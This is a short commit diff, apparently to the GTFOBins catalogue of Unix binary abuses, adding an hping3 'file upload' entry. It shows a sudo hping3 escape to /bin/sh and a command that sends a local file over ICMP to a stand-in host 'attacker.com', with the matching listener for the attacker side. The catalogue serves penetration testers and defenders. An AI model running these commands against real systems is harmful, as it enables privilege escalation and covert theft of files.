Add hping3 file upload

This commit is contained in:
Andrea Cardaci 2022-12-16 15:48:36 +01:00 committed by GitHub
commit f2fdd7fd1a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -12,4 +12,14 @@ functions:
- code: |
sudo hping3
/bin/sh
- description: |
The file is continuously sent, adjust the `--count` parameter or kill the sender when done. Receive on the attacker box with:
```
sudo hping3 --icmp --listen xxx --dump
```
code: |
RHOST=attacker.com
LFILE=file_to_read
sudo hping3 "$RHOST" --icmp --data 500 --sign xxx --file "$LFILE"
---